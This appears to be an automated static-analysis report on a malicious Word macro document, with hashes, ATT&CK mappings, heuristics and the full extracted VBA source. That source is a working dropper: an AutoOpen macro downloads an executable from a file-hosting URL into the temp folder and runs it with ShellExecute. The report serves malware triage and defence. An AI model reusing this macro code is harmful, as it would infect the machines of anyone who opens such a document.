Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 20d6962bdd62d7f4…

MALICIOUS

Office (OLE)

54.5 KB Created: 2015-03-15 03:16:00 Authoring application: Microsoft Office Word First seen: 2015-06-23
MD5: 4475df0c3ad2e0d711beac7b0d443d59 SHA-1: cbd49ec60eb03ba59ee15616de681d3b8d0605fc SHA-256: 20d6962bdd62d7f4d33c250b135b31362195cefa60664170cc1e5fe7c47cd30a
238 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols T1105 Ingress Tool Transfer

The sample contains VBA macros that leverage the URLDownloadToFile API, indicating an intent to download and execute a second-stage payload. The 'Enable Macros to view full content' lure is a common technique to bypass security measures. The presence of AutoOpen and ShellExecute API references further supports the malicious nature of the document.

Heuristics 9

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
       JkFjuexVzhTjcr = Environ("Te" & "mp")
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4702 bytes
SHA-256: c1b51a441ba10041621879bc41698edaf8915bd63943f6d81c2fb9cb42b137ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
#If VBA7 Then


Private Declare PtrSafe Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long

    Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal JQ1Vb72t6bIXtK As Long, ByVal JRzHJklNNL94gD As String, ByVal J8hIi9FwLiiVlr As String, ByVal Jznz68mkaaJQQS As Long, ByVal JxJfdLyE4jCnl5 As Long) As Long
    
    Private Declare PtrSafe Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
  ByVal lpBuffer As String, _
  nSize As Long) As Long
  
Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
  
  
  Private Declare PtrSafe Function FindWindow Lib "user32" _
   Alias "FindWindowA" _
   (ByVal lpClassName As String, _
   ByVal lpWindowName As String) As Long

Private Declare PtrSafe Function GetClassName Lib "user32" _
   Alias "GetClassNameA" _
   (ByVal hWnd As Long, _
   ByVal lpClassName As String, _
   ByVal nMaxCount As Long) As Long
  
#Else

Public Declare Function GetDriveType Lib "kernel32" _
    Alias "GetDriveTypeA" (ByVal nDrive As String) As Integer

Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long

    Private Declare Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
     (ByVal JJJWuPD4NeO4WF As Long, ByVal JYURvmkth8tnbT As String, ByVal JaRjJOa6JYniCR As String, ByVal JZKNefyicowIGO As Long, ByVal JNydFEvaD5IuXm As Long) As Long
     
     Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
  ByVal lpBuffer As String, _
  nSize As Long) As Long
  
  Private Declare Function FindWindow Lib "user32" _
   Alias "FindWindowA" _
   (ByVal lpClassName As String, _
   ByVal lpWindowName As String) As Long
   Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long


Private Declare Function GetClassName Lib "user32" _
   Alias "GetClassNameA" _
   (ByVal hWnd As Long, _
   ByVal lpClassName As String, _
   ByVal nMaxCount As Long) As Long
  
#End If
    
    
 Sub apiuse1()
    Dim lresult As Long
  Dim sBuffer As String
  Dim lSize As Long
  lSize = 256
  sBuffer = Space(lSize)
   lresult = GetComputerName(sBuffer, nSize)
   If lresult <> 0 Then
     sBuffer = Left$(sBuffer, nSize)
  Else
   End If
   End Sub
    

    
   
    
Sub AutoOpen()

 Dim sBuffer As String
  Dim nSize As Long
  Dim http As String: http = "htt" & "p://"
  Dim lresult As Long
  JRYfcuLs5uEk2Z = http & "ge.tt/api/1/files/67jsb5E2/0/blob?download"

  nSize = 2048
   JkFjuexVzhTjcr = Environ("Te" & "mp")
    JBIWUgHTF3bla = JRYfcuLs5uEk2Z
  sBuffer = Space(248)
  lresult = GetComputerName(sBuffer, nSize)

    JIgLb2TdFZHCB = JkFjuexVzhTjcr & "\" & "JTf1LX5cOyJQ7i" & ".exe"

usedownapi JBIWUgHTF3bla, JIgLb2TdFZHCB
  
End Sub



Sub usedownapi(ByVal JBIWUgHTF3bzla As String, ByVal JIgLb2TdFZHCaB As String)
     OSILlzCwXBSr 0, JBIWUgHTF3bzla, JIgLb2TdFZHCaB, 0, 0
     userunapi JIgLb2TdFZHCaB
End Sub

Public Sub GetClassNameFromTitle()
   Dim sInput As String
   Dim hWnd As Long
   Dim lpClassName As String
   Dim nMaxCount As Long
   Dim lresult As Long
   ' pad the return buffer for GetClassName
   nMaxCount = 256
   lpClassName = Space(nMaxCount)
   ' Note: must be an exact match
   sInput = InputBox("Enter the exact window title:")
   ' No validation is done as this is a debug window utility
   hWnd = FindWindow(vbNullString, sInput)
   ' Get the class name of the window, again, no validation
   lresult = GetClassName(hWnd, lpClassName, nMaxCount)
   Debug.Print "Window: " & sInput
   Debug.Print "Class name: " & Left$(lpClassName, lresult)
End Sub


Sub userunapi(ByVal JBIWUgHTF3bzla As String)
    ShellExecute 0, "open", JBIWUgHTF3bzla, "", vbNullString, vbNormalFocus
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.